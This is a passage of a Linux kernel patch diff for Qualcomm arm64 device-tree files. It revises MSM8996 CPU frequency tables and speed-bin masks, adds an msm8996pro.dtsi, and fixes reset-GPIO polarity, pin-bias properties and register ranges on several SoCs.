+@@ -144,82 +144,92 @@
+ 		/* Nominal fmax for now */
+ 		opp-307200000 {
+ 			opp-hz = /bits/ 64 <307200000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-422400000 {
+ 			opp-hz = /bits/ 64 <422400000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-480000000 {
+ 			opp-hz = /bits/ 64 <480000000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-556800000 {
+ 			opp-hz = /bits/ 64 <556800000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-652800000 {
+ 			opp-hz = /bits/ 64 <652800000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-729600000 {
+ 			opp-hz = /bits/ 64 <729600000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-844800000 {
+ 			opp-hz = /bits/ 64 <844800000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-960000000 {
+ 			opp-hz = /bits/ 64 <960000000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-1036800000 {
+ 			opp-hz = /bits/ 64 <1036800000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-1113600000 {
+ 			opp-hz = /bits/ 64 <1113600000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-1190400000 {
+ 			opp-hz = /bits/ 64 <1190400000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-1228800000 {
+ 			opp-hz = /bits/ 64 <1228800000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-1324800000 {
+ 			opp-hz = /bits/ 64 <1324800000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x5>;
++			clock-latency-ns = <200000>;
++		};
++		opp-1363200000 {
++			opp-hz = /bits/ 64 <1363200000>;
++			opp-supported-hw = <0x2>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-1401600000 {
+ 			opp-hz = /bits/ 64 <1401600000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x5>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-1478400000 {
+ 			opp-hz = /bits/ 64 <1478400000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x1>;
++			clock-latency-ns = <200000>;
++		};
++		opp-1497600000 {
++			opp-hz = /bits/ 64 <1497600000>;
++			opp-supported-hw = <0x04>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-1593600000 {
+ 			opp-hz = /bits/ 64 <1593600000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x1>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 	};
+@@ -232,127 +242,137 @@
+ 		/* Nominal fmax for now */
+ 		opp-307200000 {
+ 			opp-hz = /bits/ 64 <307200000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-403200000 {
+ 			opp-hz = /bits/ 64 <403200000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-480000000 {
+ 			opp-hz = /bits/ 64 <480000000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-556800000 {
+ 			opp-hz = /bits/ 64 <556800000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-652800000 {
+ 			opp-hz = /bits/ 64 <652800000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-729600000 {
+ 			opp-hz = /bits/ 64 <729600000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-806400000 {
+ 			opp-hz = /bits/ 64 <806400000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-883200000 {
+ 			opp-hz = /bits/ 64 <883200000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-940800000 {
+ 			opp-hz = /bits/ 64 <940800000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-1036800000 {
+ 			opp-hz = /bits/ 64 <1036800000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-1113600000 {
+ 			opp-hz = /bits/ 64 <1113600000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-1190400000 {
+ 			opp-hz = /bits/ 64 <1190400000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-1248000000 {
+ 			opp-hz = /bits/ 64 <1248000000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-1324800000 {
+ 			opp-hz = /bits/ 64 <1324800000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-1401600000 {
+ 			opp-hz = /bits/ 64 <1401600000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-1478400000 {
+ 			opp-hz = /bits/ 64 <1478400000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-1555200000 {
+ 			opp-hz = /bits/ 64 <1555200000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-1632000000 {
+ 			opp-hz = /bits/ 64 <1632000000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-1708800000 {
+ 			opp-hz = /bits/ 64 <1708800000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-1785600000 {
+ 			opp-hz = /bits/ 64 <1785600000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x7>;
++			clock-latency-ns = <200000>;
++		};
++		opp-1804800000 {
++			opp-hz = /bits/ 64 <1804800000>;
++			opp-supported-hw = <0x6>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-1824000000 {
+ 			opp-hz = /bits/ 64 <1824000000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x1>;
++			clock-latency-ns = <200000>;
++		};
++		opp-1900800000 {
++			opp-hz = /bits/ 64 <1900800000>;
++			opp-supported-hw = <0x4>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-1920000000 {
+ 			opp-hz = /bits/ 64 <1920000000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x1>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-1996800000 {
+ 			opp-hz = /bits/ 64 <1996800000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x1>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-2073600000 {
+ 			opp-hz = /bits/ 64 <2073600000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x1>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 		opp-2150400000 {
+ 			opp-hz = /bits/ 64 <2150400000>;
+-			opp-supported-hw = <0x77>;
++			opp-supported-hw = <0x1>;
+ 			clock-latency-ns = <200000>;
+ 		};
+ 	};
+@@ -1213,17 +1233,17 @@
+ 				compatible = "operating-points-v2";
+ 
+ 				/*
+-				 * 624Mhz and 560Mhz are only available on speed
+-				 * bin (1 << 0). All the rest are available on
+-				 * all bins of the hardware
++				 * 624MHz is only available on speed bins 0 and 3.
++				 * 560MHz is only available on speed bins 0, 2 and 3.
++				 * All the rest are available on all bins of the hardware.
+ 				 */
+ 				opp-624000000 {
+ 					opp-hz = /bits/ 64 <624000000>;
+-					opp-supported-hw = <0x01>;
++					opp-supported-hw = <0x09>;
+ 				};
+ 				opp-560000000 {
+ 					opp-hz = /bits/ 64 <560000000>;
+-					opp-supported-hw = <0x01>;
++					opp-supported-hw = <0x0d>;
+ 				};
+ 				opp-510000000 {
+ 					opp-hz = /bits/ 64 <510000000>;
+@@ -3342,7 +3362,7 @@
+ 					interrupt-names = "intr1", "intr2";
+ 					interrupt-controller;
+ 					#interrupt-cells = <1>;
+-					reset-gpios = <&tlmm 64 GPIO_ACTIVE_HIGH>;
++					reset-gpios = <&tlmm 64 GPIO_ACTIVE_LOW>;
+ 
+ 					slim-ifc-dev = <&tasha_ifd>;
+ 
+diff --git a/arch/arm64/boot/dts/qcom/msm8996pro.dtsi b/arch/arm64/boot/dts/qcom/msm8996pro.dtsi
+new file mode 100644
+index 0000000000000..63e1b4ec7a360
+--- /dev/null
++++ b/arch/arm64/boot/dts/qcom/msm8996pro.dtsi
+@@ -0,0 +1,266 @@
++// SPDX-License-Identifier: BSD-3-Clause
++/*
++ * Copyright (c) 2022, Linaro Limited
++ */
++
++#include "msm8996.dtsi"
++
++/ {
++	/delete-node/ opp-table-cluster0;
++	/delete-node/ opp-table-cluster1;
++
++	/*
++	 * On MSM8996 Pro the cpufreq driver shifts speed bins into the high
++	 * nibble of supported hw, so speed bin 0 becomes 0x10, speed bin 1
++	 * becomes 0x20, speed bin 2 becomes 0x40.
++	 */
++
++	cluster0_opp: opp-table-cluster0 {
++		compatible = "operating-points-v2-kryo-cpu";
++		nvmem-cells = <&speedbin_efuse>;
++		opp-shared;
++
++		opp-307200000 {
++			opp-hz = /bits/ 64 <307200000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-384000000 {
++			opp-hz = /bits/ 64 <384000000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-460800000 {
++			opp-hz = /bits/ 64 <460800000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-537600000 {
++			opp-hz = /bits/ 64 <537600000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-614400000 {
++			opp-hz = /bits/ 64 <614400000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-691200000 {
++			opp-hz = /bits/ 64 <691200000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-768000000 {
++			opp-hz = /bits/ 64 <768000000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-844800000 {
++			opp-hz = /bits/ 64 <844800000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-902400000 {
++			opp-hz = /bits/ 64 <902400000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-979200000 {
++			opp-hz = /bits/ 64 <979200000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-1056000000 {
++			opp-hz = /bits/ 64 <1056000000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-1132800000 {
++			opp-hz = /bits/ 64 <1132800000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-1209600000 {
++			opp-hz = /bits/ 64 <1209600000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-1286400000 {
++			opp-hz = /bits/ 64 <1286400000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-1363200000 {
++			opp-hz = /bits/ 64 <1363200000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-1440000000 {
++			opp-hz = /bits/ 64 <1440000000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-1516800000 {
++			opp-hz = /bits/ 64 <1516800000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-1593600000 {
++			opp-hz = /bits/ 64 <1593600000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-1996800000 {
++			opp-hz = /bits/ 64 <1996800000>;
++			opp-supported-hw = <0x20>;
++			clock-latency-ns = <200000>;
++		};
++		opp-2188800000 {
++			opp-hz = /bits/ 64 <2188800000>;
++			opp-supported-hw = <0x10>;
++			clock-latency-ns = <200000>;
++		};
++	};
++
++	cluster1_opp: opp-table-cluster1 {
++		compatible = "operating-points-v2-kryo-cpu";
++		nvmem-cells = <&speedbin_efuse>;
++		opp-shared;
++
++		opp-307200000 {
++			opp-hz = /bits/ 64 <307200000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-384000000 {
++			opp-hz = /bits/ 64 <384000000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-460800000 {
++			opp-hz = /bits/ 64 <460800000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-537600000 {
++			opp-hz = /bits/ 64 <537600000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-614400000 {
++			opp-hz = /bits/ 64 <614400000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-691200000 {
++			opp-hz = /bits/ 64 <691200000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-748800000 {
++			opp-hz = /bits/ 64 <748800000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-825600000 {
++			opp-hz = /bits/ 64 <825600000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-902400000 {
++			opp-hz = /bits/ 64 <902400000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-979200000 {
++			opp-hz = /bits/ 64 <979200000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-1056000000 {
++			opp-hz = /bits/ 64 <1056000000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-1132800000 {
++			opp-hz = /bits/ 64 <1132800000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-1209600000 {
++			opp-hz = /bits/ 64 <1209600000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-1286400000 {
++			opp-hz = /bits/ 64 <1286400000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-1363200000 {
++			opp-hz = /bits/ 64 <1363200000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-1440000000 {
++			opp-hz = /bits/ 64 <1440000000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-1516800000 {
++			opp-hz = /bits/ 64 <1516800000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-1593600000 {
++			opp-hz = /bits/ 64 <1593600000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-1670400000 {
++			opp-hz = /bits/ 64 <1670400000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-1747200000 {
++			opp-hz = /bits/ 64 <1747200000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-1824000000 {
++			opp-hz = /bits/ 64 <1824000000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-1900800000 {
++			opp-hz = /bits/ 64 <1900800000>;
++			opp-supported-hw = <0x70>;
++			clock-latency-ns = <200000>;
++		};
++		opp-1977600000 {
++			opp-hz = /bits/ 64 <1977600000>;
++			opp-supported-hw = <0x30>;
++			clock-latency-ns = <200000>;
++		};
++		opp-2054400000 {
++			opp-hz = /bits/ 64 <2054400000>;
++			opp-supported-hw = <0x30>;
++			clock-latency-ns = <200000>;
++		};
++		opp-2150400000 {
++			opp-hz = /bits/ 64 <2150400000>;
++			opp-supported-hw = <0x30>;
++			clock-latency-ns = <200000>;
++		};
++		opp-2246400000 {
++			opp-hz = /bits/ 64 <2246400000>;
++			opp-supported-hw = <0x10>;
++			clock-latency-ns = <200000>;
++		};
++		opp-2342400000 {
++			opp-hz = /bits/ 64 <2342400000>;
++			opp-supported-hw = <0x10>;
++			clock-latency-ns = <200000>;
++		};
++	};
++};
+diff --git a/arch/arm64/boot/dts/qcom/pm6350.dtsi b/arch/arm64/boot/dts/qcom/pm6350.dtsi
+index ecf9b99191828..68245d78d2b93 100644
+--- a/arch/arm64/boot/dts/qcom/pm6350.dtsi
++++ b/arch/arm64/boot/dts/qcom/pm6350.dtsi
+@@ -3,6 +3,7 @@
+  * Copyright (c) 2021, Luca Weiss <luca@z3ntu.xyz>
+  */
+ 
++#include <dt-bindings/input/input.h>
+ #include <dt-bindings/spmi/spmi.h>
+ 
+ &spmi_bus {
+diff --git a/arch/arm64/boot/dts/qcom/pm660.dtsi b/arch/arm64/boot/dts/qcom/pm660.dtsi
+index e1622b16c08bd..02a69ac0149b2 100644
+--- a/arch/arm64/boot/dts/qcom/pm660.dtsi
++++ b/arch/arm64/boot/dts/qcom/pm660.dtsi
+@@ -163,7 +163,7 @@
+ 				qcom,pre-scaling = <1 3>;
+ 			};
+ 
+-			vcoin: vcoin@83 {
++			vcoin: vcoin@85 {
+ 				reg = <ADC5_VCOIN>;
+ 				qcom,decimation = <1024>;
+ 				qcom,pre-scaling = <1 3>;
+diff --git a/arch/arm64/boot/dts/qcom/sc7180-trogdor-homestar.dtsi b/arch/arm64/boot/dts/qcom/sc7180-trogdor-homestar.dtsi
+index 1bd6c7dcd9e91..bfab67f4a7c9c 100644
+--- a/arch/arm64/boot/dts/qcom/sc7180-trogdor-homestar.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc7180-trogdor-homestar.dtsi
+@@ -194,6 +194,12 @@ ap_ts_pen_1v8: &i2c4 {
+ 		pins = "gpio49", "gpio50", "gpio51", "gpio52";
+ 		function = "mi2s_1";
+ 	};
++
++	pinconf {
++		pins = "gpio49", "gpio50", "gpio51", "gpio52";
++		drive-strength = <2>;
++		bias-pull-down;
++	};
+ };
+ 
+ &ts_reset_l {
+diff --git a/arch/arm64/boot/dts/qcom/sc7280-idp.dts b/arch/arm64/boot/dts/qcom/sc7280-idp.dts
+index 7559164cdda08..e2e37a0292ad6 100644
+--- a/arch/arm64/boot/dts/qcom/sc7280-idp.dts
++++ b/arch/arm64/boot/dts/qcom/sc7280-idp.dts
+@@ -10,7 +10,6 @@
+ #include <dt-bindings/iio/qcom,spmi-adc7-pmr735a.h>
+ #include "sc7280-idp.dtsi"
+ #include "pmr735a.dtsi"
+-#include "sc7280-herobrine-lte-sku.dtsi"
+ 
+ / {
+ 	model = "Qualcomm Technologies, Inc. sc7280 IDP SKU1 platform";
+diff --git a/arch/arm64/boot/dts/qcom/sc7280-idp.dtsi b/arch/arm64/boot/dts/qcom/sc7280-idp.dtsi
+index cd432a2856a7b..ca50f0ba9b815 100644
+--- a/arch/arm64/boot/dts/qcom/sc7280-idp.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc7280-idp.dtsi
+@@ -13,6 +13,7 @@
+ #include "pmk8350.dtsi"
+ 
+ #include "sc7280-chrome-common.dtsi"
++#include "sc7280-herobrine-lte-sku.dtsi"
+ 
+ / {
+ 	aliases {
+@@ -34,7 +35,7 @@
+ 		pinctrl-0 = <&wcd_reset_n>;
+ 		pinctrl-1 = <&wcd_reset_n_sleep>;
+ 
+-		reset-gpios = <&tlmm 83 GPIO_ACTIVE_HIGH>;
++		reset-gpios = <&tlmm 83 GPIO_ACTIVE_LOW>;
+ 
+ 		qcom,rx-device = <&wcd_rx>;
+ 		qcom,tx-device = <&wcd_tx>;
+diff --git a/arch/arm64/boot/dts/qcom/sc7280-qcard.dtsi b/arch/arm64/boot/dts/qcom/sc7280-qcard.dtsi
+index 4b8c676b0bb19..f7665b3799233 100644
+--- a/arch/arm64/boot/dts/qcom/sc7280-qcard.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc7280-qcard.dtsi
+@@ -37,7 +37,7 @@
+ 		pinctrl-0 = <&wcd_reset_n>, <&us_euro_hs_sel>;
+ 		pinctrl-1 = <&wcd_reset_n_sleep>, <&us_euro_hs_sel>;
+ 
+-		reset-gpios = <&tlmm 83 GPIO_ACTIVE_HIGH>;
++		reset-gpios = <&tlmm 83 GPIO_ACTIVE_LOW>;
+ 		us-euro-gpios = <&tlmm 81 GPIO_ACTIVE_HIGH>;
+ 
+ 		qcom,rx-device = <&wcd_rx>;
+diff --git a/arch/arm64/boot/dts/qcom/sdm630.dtsi b/arch/arm64/boot/dts/qcom/sdm630.dtsi
+index b51b85f583e5d..e119060ac56cb 100644
+--- a/arch/arm64/boot/dts/qcom/sdm630.dtsi
++++ b/arch/arm64/boot/dts/qcom/sdm630.dtsi
+@@ -779,7 +779,7 @@
+ 					pins = "gpio17", "gpio18", "gpio19";
+ 					function = "gpio";
+ 					drive-strength = <2>;
+-					bias-no-pull;
++					bias-disable;
+ 				};
+ 			};
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sdm845-cheza.dtsi b/arch/arm64/boot/dts/qcom/sdm845-cheza.dtsi
+index b5eb8f7eca1d5..b5f11fbcc3004 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845-cheza.dtsi
++++ b/arch/arm64/boot/dts/qcom/sdm845-cheza.dtsi
+@@ -1436,7 +1436,7 @@ ap_ts_i2c: &i2c14 {
+ 		config {
+ 			pins = "gpio126";
+ 			function = "gpio";
+-			bias-no-pull;
++			bias-disable;
+ 			drive-strength = <2>;
+ 			output-low;
+ 		};
+@@ -1446,7 +1446,7 @@ ap_ts_i2c: &i2c14 {
+ 		config {
+ 			pins = "gpio126";
+ 			function = "gpio";
+-			bias-no-pull;
++			bias-disable;
+ 			drive-strength = <2>;
+ 			output-high;
+ 		};
+diff --git a/arch/arm64/boot/dts/qcom/sdm845-xiaomi-polaris.dts b/arch/arm64/boot/dts/qcom/sdm845-xiaomi-polaris.dts
+index afc17e4d403fc..f982594896796 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845-xiaomi-polaris.dts
++++ b/arch/arm64/boot/dts/qcom/sdm845-xiaomi-polaris.dts
+@@ -628,7 +628,7 @@
+ 	};
+ 
+ 	wcd_intr_default: wcd-intr-default {
+-		pins = "goui54";
++		pins = "gpio54";
+ 		function = "gpio";
+ 		input-enable;
+ 		bias-pull-down;
+diff --git a/arch/arm64/boot/dts/qcom/sm6125.dtsi b/arch/arm64/boot/dts/qcom/sm6125.dtsi
+index 1fe3fa3ad8770..7818fb6c5a10a 100644
+--- a/arch/arm64/boot/dts/qcom/sm6125.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm6125.dtsi
+@@ -458,7 +458,7 @@
+ 		sdhc_1: mmc@4744000 {
+ 			compatible = "qcom,sm6125-sdhci", "qcom,sdhci-msm-v5";
+ 			reg = <0x04744000 0x1000>, <0x04745000 0x1000>;
+-			reg-names = "hc", "core";
++			reg-names = "hc", "cqhci";
+ 
+ 			interrupts = <GIC_SPI 348 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 352 IRQ_TYPE_LEVEL_HIGH>;
+diff --git a/arch/arm64/boot/dts/qcom/sm6350.dtsi b/arch/arm64/boot/dts/qcom/sm6350.dtsi
+index c39de7d3ace0b..7be5fc8dec671 100644
+--- a/arch/arm64/boot/dts/qcom/sm6350.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm6350.dtsi
+@@ -485,6 +485,7 @@
+ 			interrupts = <GIC_SPI 641 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 644 IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "hc_irq", "pwr_irq";
++			iommus = <&apps_smmu 0x60 0x0>;
+ 
+ 			clocks = <&gcc GCC_SDCC1_AHB_CLK>,
+ 				 <&gcc GCC_SDCC1_APPS_CLK>,
+@@ -1063,6 +1064,7 @@
+ 			interrupts = <GIC_SPI 204 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 222 IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "hc_irq", "pwr_irq";
++			iommus = <&apps_smmu 0x560 0x0>;
+ 
+ 			clocks = <&gcc GCC_SDCC2_AHB_CLK>,
+ 				 <&gcc GCC_SDCC2_APPS_CLK>,
+@@ -1148,15 +1150,11 @@
+ 			dp_phy: dp-phy@88ea200 {
+ 				reg = <0 0x088ea200 0 0x200>,
+ 				      <0 0x088ea400 0 0x200>,
+-				      <0 0x088eac00 0 0x400>,
++				      <0 0x088eaa00 0 0x200>,
+ 				      <0 0x088ea600 0 0x200>,
+-				      <0 0x088ea800 0 0x200>,
+-				      <0 0x088eaa00 0 0x100>;
++				      <0 0x088ea800 0 0x200>;
+ 				#phy-cells = <0>;
+ 				#clock-cells = <1>;
+-				clocks = <&gcc GCC_USB3_PRIM_PHY_PIPE_CLK>;
+-				clock-names = "pipe0";
+-				clock-output-names = "usb3_phy_pipe_clk_src";
+ 			};
+ 		};
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sm8150.dtsi b/arch/arm64/boot/dts/qcom/sm8150.dtsi
+index cef8c4f4f0ff2..4a527a64772b4 100644
+--- a/arch/arm64/boot/dts/qcom/sm8150.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8150.dtsi
+@@ -2032,11 +2032,11 @@
+ 			status = "disabled";
+ 
+ 			ufs_mem_phy_lanes: phy@1d87400 {
+-				reg = <0 0x01d87400 0 0x108>,
+-				      <0 0x01d87600 0 0x1e0>,
+-				      <0 0x01d87c00 0 0x1dc>,
+-				      <0 0x01d87800 0 0x108>,
+-				      <0 0x01d87a00 0 0x1e0>;
++				reg = <0 0x01d87400 0 0x16c>,
++				      <0 0x01d87600 0 0x200>,
++				      <0 0x01d87c00 0 0x200>,
++				      <0 0x01d87800 0 0x16c>,
++				      <0 0x01d87a00 0 0x200>;
+ 				#phy-cells = <0>;
+ 			};
+ 		};
+diff --git a/arch/arm64/boot/dts/qcom/sm8250-mtp.dts b/arch/arm64/boot/dts/qcom/sm8250-mtp.dts
+index a102aa5efa326..a05fe468e0b41 100644
+--- a/arch/arm64/boot/dts/qcom/sm8250-mtp.dts
++++ b/arch/arm64/boot/dts/qcom/sm8250-mtp.dts
+@@ -635,7 +635,7 @@
+ 	wcd938x: codec {
+ 		compatible = "qcom,wcd9380-codec";
+ 		#sound-dai-cells = <1>;
+-		reset-gpios = <&tlmm 32 GPIO_ACTIVE_HIGH>;
++		reset-gpios = <&tlmm 32 GPIO_ACTIVE_LOW>;
+ 		vdd-buck-supply = <&vreg_s4a_1p8>;
+ 		vdd-rxtx-supply = <&vreg_s4a_1p8>;
+ 		vdd-io-supply = <&vreg_s4a_1p8>;
+diff --git a/arch/arm64/boot/dts/qcom/sm8250-sony-xperia-edo.dtsi b/arch/arm64/boot/dts/qcom/sm8250-sony-xperia-edo.dtsi
+index 5428aab3058dd..e4769dcfaad7b 100644
+--- a/arch/arm64/boot/dts/qcom/sm8250-sony-xperia-edo.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8250-sony-xperia-edo.dtsi
+@@ -619,7 +619,7 @@
+ 		pins = "gpio39";
+ 		function = "gpio";
+ 		drive-strength = <2>;
+-		bias-disabled;
++		bias-disable;
+ 		input-enable;
+ 	};
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sm8250.dtsi b/arch/arm64/boot/dts/qcom/sm8250.dtsi
+index e276eed1f8e2c..29e352a577311 100644
+--- a/arch/arm64/boot/dts/qcom/sm8250.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8250.dtsi
+@@ -2180,11 +2180,11 @@
+ 			status = "disabled";
+ 
+ 			ufs_mem_phy_lanes: phy@1d87400 {
+-				reg = <0 0x01d87400 0 0x108>,
+-				      <0 0x01d87600 0 0x1e0>,
